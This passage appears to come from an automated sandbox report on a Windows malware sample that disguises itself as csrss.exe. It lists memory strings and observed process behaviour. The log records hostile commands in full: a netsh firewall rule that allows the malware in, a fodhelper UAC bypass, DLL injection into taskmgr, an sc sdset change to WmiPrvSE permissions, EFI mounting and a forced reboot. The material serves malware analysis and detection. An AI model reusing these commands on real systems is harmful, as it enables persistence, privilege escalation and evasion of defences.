linkpathlocationmac_addrmountvolmsvmmoufno anodeno-cacheno_proxypollDescreadfromrecvfromreflect.runnableruntime.rwmutexRrwmutexWscavengeshutdownstrconv.taskkilltor_modetraceBuftrigger=unixgramunknown(usernamevmmemctlvmx_svgawalk: %wwsaioctlwuauservx509sha1yuio.top (forced) B exp.) B work ( blocked= in use)
Source: csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: m=] = ] n=allgallparchasn1avx2basebindbitsbmi1bmi2boolcallcap cas1cas2cas3cas4cas5cas6chandatedeaddialdoneermsetagethmfailfileflagfromftpsfuncgziphosthourhttpicmpidleigmpint8itabjsonkindlinkmdnsnullopenpathpipepop3quitreadrootsbrkseeksid=sizesmtpsse3tag:tcp4texttruetypeudp4uintunixuuidvaryvmcixn-- -%s (at ...
Source: csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: too many linkstoo many userstorrc filenameunexpected EOFunknown code: unknown error unknown methodunknown mode: unreachable: unsafe.PointeruserArenaStatevirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #window createdwork.full != 0xenservice.exezero parameter with GC prog
Source: csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: , i = , not , val -BEFV--DYOR--FMLD--FZTA--IRXC--JFQI--JQGP--JSKV--JZUF--KGQJ--KSFO--MKND--MOHU--NSFS--PFQJ--PLND--RTMD--VRSM--XQVL-.local.onion/%d-%s370000390625:31461<-chanAcceptAnswerArabicAugustBUTTONBasic BitBltBrahmiCANCELCONIN$CancelCarianChakmaCommonCookieCopticExpectFltMgrFormatFridayGOAWAYGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLengthLepchaLockedLycianLydianMondayPADDEDPcaSvcPragmaRejangSCHED STREETServerStringSundaySyriacTai_LeTangutTeluguThaanaTypeMXTypeNSUTC+12UTC+13UTC-02UTC-08UTC-09UTC-11VBoxSFWINDIRWanchoWinMonWinmonX25519Yezidi[]byte\??\%s\csrss\ufffd
Source: csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: and got= max= ms, ptr tab= top=%s %q%s %s%s*%d%s/%s%s:%d%s=%s&#34;&#39;&amp;+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-0930.avif.html.jpeg.json.wasm.webp1.4.2156253.2.250001500025000350004500055000650512560015600278125:***@:path<nil>AdlamAprilBamumBatakBuhidCall ClassCountDograECDSAErrorFlagsFoundGetDCGreekHTTP/KhmerLatinLimbuLocalLstatMarchNONCENushuOghamOriyaOsageP-224P-256P-384P-521PGDSEREALMRangeRealmRunicSHA-1STermTakriTamilTypeAUSTARUUID=\u202] = (allowarrayatimebad nchdirchmodclosecsrssctimedeferfalsefaultfilesfloatgcinggeoipgnamegscanhchanhostshttpsimap2imap3imapsinit int16int32int64matchmheapmkdirmonthmtimentohspanicparsepgdsepop3sproxyrangermdirrouterune scav schedsdsetsleepslicesockssse41sse42ssse3sudogsweeptext/tls: torrctotaltraceuint8unameusageuser=utf-8valuevmusbvmx86write B -> Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...)
Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: 100-continue127.0.0.1:%d127.0.0.1:53152587890625762939453125AUTHENTICATEBidi_ControlCIDR addressCONTINUATIONCfgMgr32.dllCoCreateGuidCoInitializeContent TypeContent-TypeCookie.ValueCreateEventWCreateMutexWDeleteObjectECDSA-SHA256ECDSA-SHA384ECDSA-SHA512ErrUnknownPCFindNextFileGetAddrInfoWGetConsoleCPGetLastErrorGetLengthSidGetProcessIdGetStdHandleGetTempPathWGetUserGeoIDGlobalUnlockGlobal\csrssI'm a teapotInstAltMatchJoin_ControlLittleEndianLoadLibraryWLoadResourceLockResourceMax-ForwardsMeetei_MayekMime-VersionMulti-StatusNot ExtendedNot ModifiedNtCreateFileOpenServiceWPUSH_PROMISEPahawh_HmongRCodeRefusedRCodeSuccessReadConsoleWReleaseMutexReportEventWResumeThreadRevertToSelfRoInitializeS-1-5-32-544SERIALNUMBERSelectObjectServer ErrorSetEndOfFileSetErrorModeSetStdHandleSora_SompengSyloti_NagriSysStringLenThread32NextTor mode setTransmitFileUnauthorizedUnlockFileExVBoxTray.exeVariantClearVirtualAllocVirtualQueryWinmon32.sysWinmon64.sysWintrust.dllX-ImforwardsX-Powered-By[[:^ascii:]]\/(\d+)-(.*)\\.\WinMonFSabi mismatchadvapi32.dllaltmatch -> anynotnl -> bad flushGenbad g statusbad g0 stackbad recoverybad value %dbootmgfw.efibuild_numberc ap trafficc hs trafficcaller errorcan't happencas64 failedcdn is emptychan receiveclose notifycontent-typecontext.TODOcountry_codedse disableddumping heapend tracegc
Enables debug privileges
Source: C:\Users\user\Desktop\kdsyitkxmS.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\rss\csrss.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\rss\csrss.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\rss\csrss.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion
barindex
Performs DNS TXT record lookups
Source: Traffic DNS traffic detected: queries for: ec87b504-92ea-4d22-a937-161700799581.uuid.duniadekho.bar
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\kdsyitkxmS.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile Jump to behavior
Source: C:\Users\user\Desktop\kdsyitkxmS.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile Jump to behavior
Source: C:\Users\user\Desktop\kdsyitkxmS.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes" Jump to behavior
Source: C:\Users\user\Desktop\kdsyitkxmS.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile Jump to behavior
Source: C:\Users\user\Desktop\kdsyitkxmS.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile Jump to behavior
Source: C:\Users\user\Desktop\kdsyitkxmS.exe Process created: C:\Windows\rss\csrss.exe C:\Windows\rss\csrss.exe Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes Jump to behavior
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile Jump to behavior
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile Jump to behavior
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile Jump to behavior
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s Jump to behavior
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d Jump to behavior
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /s Jump to behavior
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\mountvol.exe mountvol B: /d Jump to behavior
Source: C:\Windows\rss\csrss.exe Process created: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll Jump to behavior
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\shutdown.exe shutdown -r -t 5 Jump to behavior
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD) Jump to behavior
Source: C:\Windows\rss\csrss.exe Process created: C:\Users\user\AppData\Local\Temp\csrss\proxy\proxy.exe C:\Users\user\AppData\Local\Temp\csrss\proxy\proxy.exe -bind-address 127.0.0.1:31466 Jump to behavior
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fodhelper.exe fodhelper Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe" Jump to behavior
Source: C:\Windows\System32\fodhelper.exe Process created: C:\Windows\rss\csrss.exe "C:\Windows\rss\csrss.exe" Jump to behavior
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile Jump to behavior
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\Sysnative\cmd.exe /C fodhelper
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fodhelper.exe fodhelper
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\fodhelper.exe "C:\Windows\system32\fodhelper.exe"
Source: C:\Windows\System32\fodhelper.exe Process created: C:\Windows\rss\csrss.exe "C:\Windows\rss\csrss.exe"
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
Source: C:\Windows\rss\csrss.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\sc.exe sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.746.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-US~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
